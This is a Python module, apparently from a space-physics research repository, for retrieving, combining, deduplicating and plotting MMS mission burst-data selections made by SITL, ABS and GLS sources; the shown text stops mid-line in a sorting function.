card/averageTimePerPOIHalfCassandra.py","file_name":"averageTimePerPOIHalfCassandra.py","file_ext":"py","file_size_in_byte":4618,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13210528946","text":"import os\nimport sys\nimport time_to_orbit as tto\n#os.chdir('/Users/Riley/PycharmProjects/mms_data/mms_sitl_ground_loop');\nrepo_dir = os.getcwd()\n#if not os.path.isfile(os.path.join(repo_dir, 'util.py')):\n# raise ValueError('Could not automatically determine the model root.')\n#if repo_dir not in sys.path:\n# sys.path.append(repo_dir)\n#import util\n#from pymms.sdc import selections as sel\n#from pymms.sdc import mrmms_sdc_api as api\n#from mpl_toolkits.axes_grid1.inset_locator import inset_axes\nimport glob\nimport io\nimport re\nimport requests\nimport csv\n# import pymms\n# from tqdm import tqdm\nfrom cdflib import epochs\nfrom urllib.parse import parse_qs\nimport urllib3\nimport warnings\nfrom scipy.io import readsav\nfrom getpass import getpass\nimport cdflib\nimport datetime as dt\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom matplotlib import dates as mdates\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\nimport pathlib\nimport function_folder as ff\noutdir = None\n\ntai_1958 = epochs.CDFepoch.compute_tt2000([1958, 1, 1, 0, 0, 0, 0, 0, 0])\n\n\nclass BurstSegment:\n def __init__(self, tstart, tstop, fom, discussion,\n sourceid=None, createtime=None):\n '''\n Create an object representing a burst data segment.\n\n Parameters\n ----------\n fom : int, float\n Figure of merit given to the selection\n tstart : int, str, `datetime.datetime`\n The start time of the burst segment, given as a `datetime` object,\n a TAI time in seconds since 1 Jan. 1958, or as a string formatted\n as `yyyy-MM-dd hh:mm:SS`. 
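            For example (hypothetical values), tstart='2015-09-01 12:00:00'
            and the equivalent TAI second count both resolve to the same
            instant.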
Times are converted to `datetimes`.\n tstop : int, str, `datetime.datetime`\n The stop time of the burst segment, similar to `tstart`.\n discussion : str\n Description of the segment provided by the SITL\n sourceid : str\n Username of the SITL that made the selection\n file : str\n Name of the file containing the selection\n '''\n\n # Convert tstart to datetime\n if isinstance(tstart, str):\n tstart = dt.datetime.strptime(tstart, '%Y-%m-%d %H:%M:%S')\n elif isinstance(tstart, int):\n tstart = self.__class__.tai_to_datetime(tstart)\n\n # Convert tstop to datetime\n if isinstance(tstop, str):\n tstop = dt.datetime.strptime(tstop, '%Y-%m-%d %H:%M:%S')\n elif isinstance(tstop, int):\n tstop = self.__class__.tai_to_datetime(tstop)\n\n self.discussion = discussion\n self.createtime = createtime\n self.fom = fom\n self.sourceid = sourceid\n self.tstart = tstart\n self.tstop = tstop\n\n def __str__(self):\n return ('{0} {1} {2:3.0f} {3}'\n .format(self.tstart, self.tstop, self.fom, self.discussion)\n )\n\n def __repr__(self):\n return ('selections.BurstSegment({0}, {1}, {2:3.0f}, {3})'\n .format(self.tstart, self.tstop, self.fom, self.discussion)\n )\n\n @staticmethod\n def datetime_to_list(t):\n return [t.year, t.month, t.day,\n t.hour, t.minute, t.second,\n t.microsecond // 1000, t.microsecond % 1000, 0\n ]\n\n @classmethod\n def datetime_to_tai(cls, t):\n t_list = cls.datetime_to_list(t)\n return int((epochs.CDFepoch.compute_tt2000(t_list) - tai_1958) // 1e9)\n\n @classmethod\n def tai_to_datetime(cls, t):\n tepoch = epochs.CDFepoch()\n return tepoch.to_datetime(t * int(1e9) + tai_1958)\n\n @property\n def start_time(self):\n return self.tstart.strftime('%Y-%m-%d %H:%M:%S')\n\n @property\n def stop_time(self):\n return self.tstop.strftime('%Y-%m-%d %H:%M:%S')\n\n @property\n def taistarttime(self):\n return self.__class__.datetime_to_tai(self.tstart)\n\n @property\n def taiendtime(self):\n return self.__class__.datetime_to_tai(self.tstop)\n\n\ndef _burst_data_segments_to_burst_segment(data):\n '''\n Turn selections created by `MrMMS_SDC_API.burst_data_segements` and turn\n them into `BurstSegment` instances.\n\n Parameters\n ----------\n data : dict\n Data associated with each burst segment\n\n Returns\n -------\n result : list of `BurstSegment`\n Data converted to `BurstSegment` instances\n '''\n # Look at createtime and finishtime keys to see if either can\n # substitute for a file name time stamp\n\n result = []\n for tstart, tend, fom, discussion, sourceid, createtime, status in \\\n zip(data['tstart'], data['tstop'], data['fom'],\n data['discussion'], data['sourceid'], data['createtime'],\n data['status']\n ):\n segment = BurstSegment(tstart, tend, fom, discussion,\n sourceid=sourceid,\n createtime=createtime)\n segment.status = status\n result.append(segment)\n return result\n\n\ndef _get_selections(type, start, stop,\n sort=False, combine=False, latest=True, unique=False,\n metadata=False, filter=None, case_sensitive=False):\n if latest and unique:\n raise ValueError('latest and unique keywords '\n 'are mutually exclusive.')\n\n # Burst selections can be made multiple times within the orbit.\n # Multiple submissions will be appear as repeated entires with\n # different create times, but only the last submission is the\n # official submission. 
To ensure that the last submission is\n # returned, look for selections submitted through the following\n # orbit as well.\n orbit_start = time_to_orbit(start)\n orbit_stop = time_to_orbit(stop) + 1\n\n # Get the selections\n data = burst_selections(type, orbit_start, orbit_stop)\n\n # Turn the data into BurstSegments. Adjacent segments returned\n # by `sdc.sitl_selections` have a 0 second gap between stop and\n # start times. Those returned by `sdc.burst_data_segments` are\n # separated by 10 seconds.\n if type in ('abs', 'sitl', 'gls', 'mp-dl-unh'):\n delta_t = 0.0\n converter = _sitl_selections_to_burst_segment\n elif type == 'sitl+back':\n delta_t = 10.0\n converter = _burst_data_segments_to_burst_segment\n else:\n raise ValueError('Invalid selections type {}'.format(type))\n\n # Convert data into BurstSegments\n # If there were no selections made, data will be empty without\n # keys (and throws error in _sitl_selections_to_burst_segment).\n try:\n data = converter(data)\n except KeyError:\n return []\n\n # Get metadata associated with orbit, sroi, and metadata\n if metadata:\n _get_segment_data(data, orbit_start, orbit_stop)\n\n # The official selections are those from the last submission\n # containing selections within the science_roi. Get rid of\n # all submissions except the last.\n if latest:\n data = _latest_segments(data, orbit_start, orbit_stop,\n sitl=(type == 'sitl+back'))\n\n # Get rid of extra selections obtained by changing the\n # start and stop interval\n data = [segment\n for segment in data\n if (segment.tstart >= start) \\\n and (segment.tstop <= stop)]\n\n # Additional handling of data\n if combine:\n combine_segments(data, delta_t)\n if sort:\n data = sort_segments(data)\n if unique:\n data = remove_duplicate_segments(data)\n if filter is not None:\n data = filter_segments(data, filter,\n case_sensitive=case_sensitive)\n\n return data\n\n\ndef _get_segment_data(data, orbit_start, orbit_stop, sc='mms1'):\n '''\n Add metadata associated with the orbit, SROI, and SITL window\n to each burst segment.\n\n Parameters\n ----------\n data : list of BurstSegments\n Burst selections. 
Selections are altered in-place to\n        have the following new attributes:\n\n        ================== ======================\n        Attribute          Description\n        ================== ======================\n        orbit              Orbit number\n        orbit_tstart       Orbit start time\n        orbit_tstop        Orbit stop time\n        sroi               SROI number\n        sroi_tstart        SROI start time\n        sroi_tstop         SROI stop time\n        sitl_window_tstart SITL window start time\n        sitl_window_tstop  SITL window stop time\n        ================== ======================\n    orbit_start, orbit_stop : int or np.integer\n        Orbit interval in which selections were made\n    sc : str\n        Spacecraft identifier\n    '''\n    idx = 0\n    for iorbit in range(orbit_start, orbit_stop + 1):\n        # The start and end times of the sub-regions of interest.\n        # These are the times in which selections can be made for\n        # any given orbit.\n        orbit = mission_events('orbit', iorbit, iorbit, sc=sc)\n        sroi = mission_events('sroi', iorbit, iorbit, sc=sc)\n        window = mission_events('sitl_window', iorbit, iorbit)\n        tstart = min(sroi['tstart'])\n        tend = max(sroi['tend'])\n\n        # Find the burst segments that were selected within the\n        # current SROI\n\n        while idx < len(data):\n            segment = data[idx]\n\n            # Filter out selections from the previous orbit(s)\n            # Stop when we get to the next orbit\n            if segment.tstop < tstart:\n                idx += 1\n                continue\n            if segment.tstart > tend:\n                break\n\n            # Attach the orbit, SROI, and SITL window metadata\n            # to the current segment.\n            segment.orbit = iorbit\n            segment.orbit_tstart = orbit['tstart'][0]\n            segment.orbit_tstop = orbit['tend'][0]\n\n            sroi_data = _get_sroi_number(sroi, segment.tstart, segment.tstop)\n            segment.sroi = sroi_data[0]\n            segment.sroi_tstart = sroi_data[1]\n            segment.sroi_tstop = sroi_data[2]\n\n            # A predefined SITL window no longer exists as of orbit 1098,\n            # when SITL-defined windows were implemented\n            if iorbit < 1098:\n                segment.sitl_window_tstart = window['tstart']\n                segment.sitl_window_tstop = window['tend']\n\n            idx += 1\n\n\ndef _get_sroi_number(sroi, tstart, tstop):\n    '''\n    Determine the sub-region of interest (SROI) in which a given\n    time interval resides.\n\n    Parameters\n    ----------\n    sroi : dict\n        SROI information for a specific orbit\n    tstart, tstop : `datetime.datetime`\n        Time interval\n\n    Returns\n    -------\n    result : tuple\n        The SROI number and start and stop times.\n    '''\n    sroi_num = 0\n    for sroi_tstart, sroi_tstop in zip(sroi['tstart'], sroi['tend']):\n        sroi_num += 1\n        if (tstart >= sroi_tstart) and (tstop <= sroi_tstop):\n            break\n\n    return sroi_num, sroi_tstart, sroi_tstop\n\n\ndef _latest_segments(data, orbit_start, orbit_stop, sitl=False):\n    '''\n    Return the latest burst selections submission from each orbit.\n\n    Burst selections can be submitted multiple times but only\n    the latest file serves as the official selections file.\n\n    The SITL makes selections within the SITL\n    window. 
If data is downlinked after the SITL window closes,\n selections on that data are submitted separately into the\n back structure and should be appended to the last submission\n that took place within the SITL window.\n\n Parameters\n ----------\n data : list of BurstSegments\n Burst segment selections\n orbit_start, orbit_stop : int or np.integer\n Orbits in which selections were made\n sitl : bool\n If true, the burst selections were made by the SITL and\n there are back structure submissions to take into\n consideration\n\n Returns\n -------\n results : list of BurstSegments\n The latest burst selections\n '''\n result = []\n for orbit in range(orbit_start, orbit_stop + 1):\n # The start and end times of the sub-regions of interest.\n # These are the times in which selections can be made for\n # any given orbit.\n\n # SROI information is not available before orbit 239.\n # The first SROI is defined on 2015-11-06, which is only a\n # couple of months after formal science data collection began\n # on 2015-09-01.\n\n # However, similar information is available starting at\n # 2015-08-10 (orbit 151) in the science_roi event type. It's\n # nearly equivalent because there was only a single SROI per\n # orbit during the earlier mission phases, but science_roi is\n # the span across all spacecraft.\n if orbit < 239:\n sroi = mission_events('science_roi', orbit, orbit)\n else:\n sroi = mission_events('sroi', orbit, orbit)\n tstart = min(sroi['tstart'])\n tend = max(sroi['tend'])\n\n # The SITL Window is not defined as of orbit 1098, when\n # a SITL-defined window was implemented\n if orbit >= 1098:\n sitl = False\n\n # Need to know when the SITL window closes in order to\n # keep submissions to the back structure.\n if sitl:\n sitl_window = mission_events('sitl_window', orbit, orbit)\n\n # Find the burst segments that were selected within the\n # current SROI\n create_time = None\n orbit_segments = []\n for idx, segment in enumerate(data):\n # Filter out selections from the previous orbit(s)\n # Stop when we get to the next orbit\n if segment.tstop < tstart:\n continue\n if segment.tstart > tend:\n break\n\n # Initialize with the first segment within the orbit.\n # Create times are the same for all selections within\n # a single submission. 
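\n            # (The create time is assigned when selections are submitted,\n            # so it effectively identifies a submission.)\n            # 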
There may be several submissions\n            # per orbit.\n            if create_time is None:\n                create_time = segment.createtime\n\n            # Keep segments from the same submission (create time).\n            # If there is a new submission within the orbit, take\n            # selections from the new submission and discard those\n            # from the old.\n            #\n            # Submissions to the back structure occur after the\n            # SITL window has closed and are in addition to whatever\n            # the latest submission was.\n            #\n            # GLS and ABS selections can occur after the SITL window\n            # closes, but those are treated the same as selections\n            # made within the SITL window.\n            if abs(create_time - segment.createtime) < dt.timedelta(seconds=10):\n                orbit_segments.append(segment)\n            elif segment.createtime > create_time:\n                if sitl and (segment.createtime > sitl_window['tend'][0]):\n                    orbit_segments.append(segment)\n                else:\n                    create_time = segment.createtime\n                    orbit_segments = [segment]\n            else:\n                continue\n\n        # Truncate the segments and append this orbit's submissions\n        # to the overall results.\n        data = data[idx:]\n        result.extend(orbit_segments)\n\n    return result\n\n\ndef _mission_events_to_burst_segment(data):\n    '''\n    Convert selections created by `MrMMS_SDC_API.mission_events`\n    into `BurstSegment` instances.\n\n    Parameters\n    ----------\n    data : dict\n        Data associated with each burst segment\n\n    Returns\n    -------\n    result : list of `BurstSegment`\n        Data converted to `BurstSegment` instances\n    '''\n    raise NotImplementedError\n\n\ndef _sitl_selections_to_burst_segment(data):\n    '''\n    Convert selections created by `MrMMS_SDC_API.sitl_selections`\n    into `BurstSegment` instances.\n\n    Parameters\n    ----------\n    data : dict\n        Data associated with each burst segment\n\n    Returns\n    -------\n    result : list of `BurstSegment`\n        Data converted to `BurstSegment` instances\n    '''\n    result = []\n    for idx in range(len(data['fom'])):\n        result.append(BurstSegment(data['tstart'][idx], data['tstop'][idx],\n                                   data['fom'][idx], data['discussion'][idx],\n                                   sourceid=data['sourceid'][idx],\n                                   createtime=data['createtime'][idx],\n                                   )\n                      )\n    return result\n\n\ndef combine_segments(data, dt_contig=0):\n    '''\n    Combine contiguous burst selections into single selections.\n\n    Parameters\n    ----------\n    data : list of `BurstSegment`\n        Selections to be combined.\n    dt_contig : int\n        Time interval between adjacent selections. For selections\n        returned by `pymms.sitl_selections()`, this is 0. For selections\n        returned by `pymms.burst_data_segment()`, this is 10.\n    '''\n    # Any time delta > dt_contig sec indicates the end of a contiguous interval\n    t_deltas = [(seg1.tstart - seg0.tstop).total_seconds()\n                for seg1, seg0 in zip(data[1:], data[:-1])\n                ]\n\n    # t_deltas has one fewer element than data at this stage. Append\n    # a large sentinel value (1000 s) to indicate that the last element\n    # in data does not have a contiguous neighbor. This makes the number\n    # of elements in each list equal unless data is empty. 
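\n    #\n    # Illustrative sketch (hypothetical values) with dt_contig=0:\n    #   (10:00:00-10:00:10, fom=50, 'MP') + (10:00:10-10:00:20, fom=50, 'MP')\n    #   -> one segment spanning 10:00:00-10:00:20.\n    #\n    # 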
Do not append when data\n    # is empty, to avoid the indexing errors below.\n    if len(data) > 0:\n        t_deltas.append(1000)\n\n    icontig = 0  # Current contiguous interval\n\n    # Check if adjacent elements are continuous in time\n    for idx, t_delta in enumerate(t_deltas):\n        # Contiguous segments are separated by dt_contig seconds.\n        # The last element of t_deltas is the 1000 s sentinel, so it\n        # does not pass this condition and idx+1 will not cause an\n        # IndexError\n        if t_delta == dt_contig:\n            # And unique segments have the same fom and discussion\n            if (data[icontig].fom == data[idx + 1].fom) and \\\n                    (data[icontig].discussion == data[idx + 1].discussion):\n                continue\n\n        # End of a contiguous interval\n        data[icontig].tstop = data[idx].tstop\n\n        # Next interval\n        icontig = icontig + 1\n\n        # Move data for new contiguous segments to beginning of array\n        try:\n            data[icontig] = data[idx + 1]\n        except IndexError:\n            pass\n\n    # Truncate data beyond last contiguous interval\n    del data[icontig:]\n\n\ndef filter_segments(data, filter, case_sensitive=False):\n    '''\n    Filter burst selections by their discussion string.\n\n    Parameters\n    ----------\n    data : list of `BurstSegment`\n        Selections to be filtered. Each segment must have a\n        `discussion` attribute.\n    filter : str\n        Regular expression used to filter the data\n    case_sensitive : bool\n        Make the filter case sensitive\n\n    Returns\n    -------\n    results : list of `BurstSegment`\n        Segments whose discussion string matches `filter`.\n    '''\n    # Make case-insensitive searches the default\n    flags = re.IGNORECASE\n    if case_sensitive:\n        flags = 0\n\n    return [seg\n            for seg in data\n            if re.search(filter, seg.discussion, flags)]\n\n\ndef plot_metric(ref_data, test_data, fig, labels, location,\n                nbins=10):\n    '''\n    Visualize the overlap between segments.\n\n    Parameters\n    ----------\n    ref_data : list of `BurstSegment`s\n        Reference burst segments\n    test_data : list of `BurstSegment`s\n        Test burst segments. 
Determine which test segments\n        overlap with the reference segments and by how much\n    fig : `matplotlib.figure.Figure`\n        Figure in which to place the axes\n    labels : tuple of str\n        Labels for the reference and test segments\n    location : tuple\n        Location of the figure (row, col, nrows, ncols)\n    nbins : int\n        Number of histogram bins to create\n\n    Returns\n    -------\n    ax : `matplotlib.pyplot.Axes`\n        Axes in which data is displayed\n    ref_test : list of dict\n        Overlap statistics from `selection_overlap` for each\n        reference segment.\n    '''\n\n    # Determine by how much the test data overlaps with\n    # the reference data.\n    ref_test = [selection_overlap(segment, test_data)\n                for segment in ref_data]\n\n    # Overlap statistics\n    # - Number of segments selected\n    # - Percentage of segments selected\n    # - Percent overlap from each segment\n    ref_test_selected = sum(selection['n_selections'] > 0\n                            for selection in ref_test)\n    ref_test_pct_selected = ref_test_selected / len(ref_test) * 100.0\n    ref_test_pct_overlap = [selection['pct_overlap'] for selection in ref_test]\n\n    # Calculate the plot index from the (row,col) subplot location\n    plot_idx = lambda rowcol, ncols: (rowcol[0] - 1) * ncols + rowcol[1]\n\n    # Create a figure\n    ax = fig.add_subplot(location[2], location[3],\n                         plot_idx(location[0:2], location[3]))\n    hh = ax.hist(ref_test_pct_overlap, bins=nbins, range=(0, 100))\n    # ax.set_xlabel('% Overlap Between {0} and {1} Segments'.format(*labels))\n    if location[0] == location[2]:\n        ax.set_xlabel('% Overlap per Segment')\n    if location[1] == 1:\n        ax.set_ylabel('Occurrence')\n    ax.text(0.5, 0.98, '{0:4.1f}% of {1:d}'\n            .format(ref_test_pct_selected, len(ref_test)),\n            verticalalignment='top', horizontalalignment='center',\n            transform=ax.transAxes)\n    ax.set_title('{0} Segments\nSelected by {1}'.format(*labels))\n\n    return ax, ref_test\n\n\ndef metric(sroi=None, output_dir=None, figtype=None):\n    do_sroi = False\n    if sroi in (1, 2, 3):\n        do_sroi = True\n\n    if output_dir is None:\n        output_dir = pathlib.Path('~/').expanduser()\n    else:\n        output_dir = pathlib.Path(output_dir).expanduser()\n\n    starttime = dt.datetime(2019, 10, 17)\n\n    # Find SROI\n    # start_date, end_date = gls_get_sroi(starttime)\n    start_date = dt.datetime(2019, 10, 19)\n    # end_date = start_date + dt.timedelta(days=5)\n    end_date = dt.datetime.now()\n\n    abs_data = selections('abs', start_date, end_date,\n                          latest=True, combine=True, metadata=do_sroi)\n\n    gls_data = selections('mp-dl-unh', start_date, end_date,\n                          latest=True, combine=True, metadata=do_sroi)\n\n    sitl_data = selections('sitl+back', start_date, end_date,\n                           latest=True, combine=True, metadata=do_sroi)\n\n    # Filter by SROI\n    if do_sroi:\n        abs_data = [s for s in abs_data if s.sroi == sroi]\n        sitl_data = [s for s in sitl_data if s.sroi == sroi]\n        gls_data = [s for s in gls_data if s.sroi == sroi]\n\n    sitl_mp_data = filter_segments(sitl_data, '(MP|Magnetopause)')\n\n    # Create a figure\n    nbins = 10\n    nrows = 4\n    ncols = 3\n    fig = plt.figure(figsize=(8.5, 10))\n    fig.subplots_adjust(hspace=0.55, wspace=0.3)\n\n    # GLS-SITL Comparison\n    ax, gls_sitl = plot_metric(gls_data, sitl_data, fig,\n                               ('GLS', 'SITL'), (1, 1, nrows, ncols),\n                               nbins=nbins)\n    ax, sitl_gls = plot_metric(sitl_data, gls_data, fig,\n                               ('SITL', 'GLS'), (2, 1, nrows, ncols),\n                               nbins=nbins)\n    ax, gls_sitl_mp = plot_metric(gls_data, sitl_mp_data, fig,\n                                  ('GLS', 'SITL MP'), (3, 1, nrows, ncols),\n                                  nbins=nbins)\n    ax, sitl_mp_gls = plot_metric(sitl_mp_data, gls_data, fig,\n                                  ('SITL MP', 'GLS'), (4, 1, nrows, ncols),\n                                  nbins=nbins)\n\n    # ABS-SITL 
Comparison\n ax, abs_sitl = plot_metric(abs_data, sitl_data, fig,\n ('ABS', 'SITL'), (1, 2, nrows, ncols),\n nbins=nbins)\n ax, sitl_abs = plot_metric(sitl_data, abs_data, fig,\n ('SITL', 'ABS'), (2, 2, nrows, ncols),\n nbins=nbins)\n ax, abs_sitl_mp = plot_metric(abs_data, sitl_mp_data, fig,\n ('ABS', 'SITL MP'), (3, 2, nrows, ncols),\n nbins=nbins)\n ax, sitl_mp_abs = plot_metric(sitl_mp_data, abs_data, fig,\n ('SITL MP', 'ABS'), (4, 2, nrows, ncols),\n nbins=nbins)\n\n # GLS-ABS Comparison\n abs_mp_data = [abs_data[idx]\n for idx, s in enumerate(abs_sitl_mp)\n if s['n_selections'] > 0]\n\n ax, gls_abs = plot_metric(gls_data, abs_data, fig,\n ('GLS', 'ABS'), (1, 3, nrows, ncols),\n nbins=nbins)\n ax, abs_gls = plot_metric(abs_data, gls_data, fig,\n ('ABS', 'GLS'), (2, 3, nrows, ncols),\n nbins=nbins)\n ax, gls_abs_mp = plot_metric(gls_data, abs_mp_data, fig,\n ('GLS', 'ABS MP'), (3, 3, nrows, ncols),\n nbins=nbins)\n ax, abs_mp_gls = plot_metric(abs_mp_data, gls_data, fig,\n ('ABS MP', 'GLS'), (4, 3, nrows, ncols),\n nbins=nbins)\n\n # Save the figure\n if figtype is not None:\n sroi_str = ''\n if do_sroi:\n sroi_str = '_sroi{0:d}'.format(sroi)\n filename = (output_dir\n / '_'.join(('selections_metric' + sroi_str,\n start_date.strftime('%Y%m%d%H%M%S'),\n end_date.strftime('%Y%m%d%H%M%S')\n )))\n filename = filename.with_suffix('.' + figtype)\n plt.savefig(filename.expanduser())\n\n plt.show()\n\n\ndef print_segments(data, full=False):\n '''\n Print details of the burst selections.\n\n Parameters\n ----------\n data : `BurstSegment` or list of `BurstSegment`\n Selections to be printed. Must have keys 'tstart', 'tstop',\n 'fom', 'sourceid', and 'discussion'\n '''\n if full:\n source_len = max(len(s.sourceid) for s in data)\n source_len = max(source_len, 8)\n header_fmt = '{0:>19} {1:>19} {2:>19} {3:>5} ' \\\n '{4:>19} {5:>' + str(source_len) + '} {6}'\n data_fmt = '{0:>19} {1:>19} {2:>19} {3:5.1f} ' \\\n '{4:>19}, {5:>' + str(source_len) + '} {6}'\n print(header_fmt.format('TSTART', 'TSTOP', 'CREATETIME',\n 'FOM', 'STATUS', 'SOURCEID', 'DISCUSSION'\n )\n )\n for s in data:\n try:\n status = s.status\n except AttributeError:\n status = ''\n\n createtime = dt.datetime.strftime(s.createtime,\n '%Y-%m-%d %H:%M:%S')\n print(data_fmt.format(s.start_time, s.stop_time,\n createtime, s.fom, status, s.sourceid,\n s.discussion)\n )\n return\n\n print('{0:>19} {1:>19} {2} {3}'\n .format('TSTART', 'TSTOP', 'FOM', 'DISCUSSION')\n )\n\n if isinstance(data, list):\n for selection in data:\n print(selection)\n else:\n print(data)\n\n\ndef read_csv(filename, start_time=None, stop_time=None, header=True):\n '''\n Read a CSV file with burst segment selections.\n\n Parameters\n ----------\n filename : str\n The name of the file to which `data` is to be read\n start_time : str or `datetime.datetime`\n Filter results to contain segments selected on or\n after this time. Possible only if `header` is True\n and if a column is named `'start_time'`\n stop_time : str or `datetime.datetime`\n Filter results to contain segments selected on or\n before this time. Possible only if `header` is True\n and if a column is named `'stop_time'`\n header : bool\n If `True`, the csv file has a header indicating the\n names of each column. 
If `header` is `False`, the\n        assumed column names are 'start_time', 'stop_time',\n        'fom', 'sourceid', 'discussion', 'createtime'.\n\n    Returns\n    -------\n    data : list of `BurstSegment`\n        Burst segments read from the csv file\n    '''\n    # Convert time interval to datetimes if needed\n    if isinstance(start_time, str):\n        start_time = dt.datetime.strptime(start_time, '%Y-%m-%d %H:%M:%S')\n    if isinstance(stop_time, str):\n        stop_time = dt.datetime.strptime(stop_time, '%Y-%m-%d %H:%M:%S')\n\n    file = pathlib.Path(filename)\n    data = []\n\n    # Read the file\n    with open(file.expanduser(), 'r', newline='') as csvfile:\n        csvreader = csv.reader(csvfile)\n\n        # Take column names from file header\n        if header:\n            keys = next(csvreader)\n\n        # Read the rows\n        for row in csvreader:\n            # Select the data within the time interval\n            if start_time is not None:\n                tstart = dt.datetime.strptime(row[0],\n                                              '%Y-%m-%d %H:%M:%S')\n                if tstart < start_time:\n                    continue\n            if stop_time is not None:\n                tstop = dt.datetime.strptime(row[1],\n                                             '%Y-%m-%d %H:%M:%S')\n                if tstop > stop_time:\n                    continue  # BREAK if sorted!!\n\n            # Initialize segment with required fields then add\n            # additional fields after\n            data.append(BurstSegment(row[0], row[1], float(row[2]), row[4],\n                                     sourceid=row[3], createtime=row[5]\n                                     )\n                        )\n\n    return data\n\n\ndef remove_duplicate_segments(data):\n    '''\n    If SITL or GLS selections are submitted multiple times,\n    there can be multiple copies of the same selection, or\n    altered selections that overlap with what was selected\n    previously. Find overlapping segments and select those\n    from the most recent file, as indicated by the file name.\n\n    Parameters\n    ----------\n    data : list of `BurstSegment`\n        Selections from which to prune duplicates. Segments\n        must be sorted by `tstart`.\n\n    Returns\n    -------\n    results : list of `BurstSegments`\n        Unique burst segments.\n    '''\n    results = data.copy()\n    overwrite_times = set()\n    for idx, segment in enumerate(data):\n        iahead = idx + 1\n\n        # Segments should already be sorted. Future segments\n        # overlap with the current segment if the future segment\n        # start time is closer to the current segment start\n        # time than is the current segment's end time.\n        while ((iahead < len(data)) and\n               ((data[iahead].tstart - segment.tstart) <\n                (segment.tstop - segment.tstart))\n               ):\n\n            # Remove the segment with the earlier create time\n            if segment.createtime < data[iahead].createtime:\n                remove_segment = segment\n                overwrite_time = segment.createtime\n            else:\n                remove_segment = data[iahead]\n                overwrite_time = data[iahead].createtime\n\n            # The segment may have already been removed if\n            # more than one other segment overlaps with it.\n            try:\n                results.remove(remove_segment)\n                overwrite_times.add(overwrite_time)\n            except ValueError:\n                pass\n\n            iahead += 1\n\n    # Remove all segments with create times in the overwrite set\n    # Note that the model results do not appear to be reproducible,\n    # so every time the model is run, a different set of\n    # selections is created. 
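\n    #\n    # (Hypothetical example: the same 10:00-10:01 interval submitted at\n    # create times T1 < T2 appears twice; only the T2 copy is kept.)\n    #\n    # 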
Using the filter below, data from\n    # whole days can be removed if two processes create overlapping\n    # segments at the edges of their time intervals.\n    # results = [segment\n    #            for segment in results\n    #            if segment.createtime not in overwrite_times\n    #            ]\n\n    print('# Segments Removed: {}'.format(len(data) - len(results)))\n    return results\n\n\ndef remove_duplicate_segments_v1(data):\n    idx = 0  # current index\n    i = idx  # look-ahead index\n    noverlap = 0\n    result = []\n    for idx in range(len(data)):\n        if idx < i:\n            continue\n\n        # Reference segment is the current segment\n        ref_seg = data[idx]\n        t0_ref = ref_seg.taistarttime\n        t1_ref = ref_seg.taiendtime\n        dt_ref = t1_ref - t0_ref\n\n        try:\n            # Test segments come after the reference segment. A\n            # test segment overlaps with the reference segment\n            # if its start time is closer to the reference start\n            # time than is the reference end time. If there is\n            # overlap, keep the segment that was created more\n            # recently.\n            i = idx + 1\n            while ((data[i].taistarttime - t0_ref) < dt_ref):\n                noverlap += 1\n                test_seg = data[i]\n                if data[i].createtime > data[idx].createtime:\n                    ref_seg = test_seg\n                i += 1\n        except IndexError:\n            pass\n\n        result.append(ref_seg)\n\n    print('# Overlapping Segments: {}'.format(noverlap))\n    return result\n\n\ndef selection_overlap(ref, tests):\n    '''\n    Gather overlap statistics.\n\n    Parameters\n    ----------\n    ref : `selections.BurstSegment`\n        The reference burst segment.\n    tests : list of `selections.BurstSegment`\n        The burst segments against which the reference segment is compared.\n\n    Returns\n    -------\n    out : dict\n        Data regarding how much the reference segment overlaps with the\n        test segments.\n    '''\n    out = {'dt': ref.tstop - ref.tstart,\n           'dt_next': dt.timedelta(days=7000),\n           'n_selections': 0,\n           't_overlap': dt.timedelta(seconds=0.0),\n           't_overselect': dt.timedelta(seconds=0.0),\n           'pct_overlap': 0.0,\n           'pct_overselect': 0.0\n           }\n\n    # Find which selections overlap with the given entry and by how much\n    for test in tests:\n\n        if ((test.tstart <= ref.tstop) and\n            (test.tstop >= ref.tstart)\n            ):\n            out['n_selections'] += 1\n            out['t_overlap'] += (min(test.tstop, ref.tstop)\n                                 - max(test.tstart, ref.tstart)\n                                 )\n\n        # Time to nearest interval\n        out['dt_next'] = min(out['dt_next'], abs(test.tstart - ref.tstart))\n\n    # Overlap and over-selection statistics\n    if out['n_selections'] > 0:\n        out['t_overselect'] = out['dt'] - out['t_overlap']\n        out['pct_overlap'] = out['t_overlap'] / out['dt'] * 100.0\n        out['pct_overselect'] = out['t_overselect'] / out['dt'] * 100.0\n    else:\n        out['t_overselect'] = out['dt']\n        out['pct_overselect'] = 100.0\n\n    return out\n\n\ndef selections(type, start, stop,\n               sort=False, combine=False, latest=True, unique=False,\n               metadata=False, filter=None, case_sensitive=False):\n    '''\n    Factory function for burst data selections.\n\n    Parameters\n    ----------\n    type : str\n        Type of burst data selections to retrieve. Options are 'abs',\n        'abs-all', 'sitl', 'sitl+back', 'gls', 'mp-dl-unh'.\n    start, stop : `datetime.datetime`\n        Interval over which to retrieve data\n    sort : bool\n        Sort burst segments by time. Submissions to the back structure and\n        multiple submissions or process executions in one SITL window can\n        cause multiple copies of the same selection or out-of-order\n        selections.\n    combine : bool\n        Combine adjacent selections into one selection. 
Due to downlink\n        limitations, long time duration burst segments must be broken into\n        smaller chunks.\n    latest : bool\n        For each SROI, keep only those times with the most recent time\n        of creation. Cannot be used with `unique`.\n    metadata : bool\n        Retrieve the orbit number and time interval, SROI number and time\n        interval, and SITL window time interval.\n    unique : bool\n        Return only unique segments. See `sort`. Also, a SITL may adjust\n        the time interval of their selections, so different submissions will\n        have duplicate selections but with different time stamps. This is\n        accounted for.\n    filter : str\n        Filter the burst segments by applying the regular expression to\n        the segment's discussion string.\n\n    Returns\n    -------\n    results : list of `BurstSegment`\n        Each burst segment.\n    '''\n    return _get_selections(type, start, stop,\n                           sort=sort, combine=combine, unique=unique,\n                           latest=latest, metadata=metadata,\n                           filter=filter, case_sensitive=case_sensitive)\n\n\ndef sort_segments(data, createtime=False):\n    '''\n    Sort abs, sitl, or gls selections into ascending order.\n\n    Parameters\n    ----------\n    data : list of `BurstSegment`\n        Selections to be sorted. Must have attributes 'start_time',\n        'end_time', 'fom', 'discussion', 'tstart', and 'tstop'.\n    createtime : bool\n        Sort by time created instead of by selection start time.\n\n    Returns\n    -------\n    results : list of `BurstSegment`\n        Inputs sorted by time\n    '''\n    if createtime:\n        return sorted(data, key=lambda x: x.createtime)\n    return sorted(data, key=lambda x: 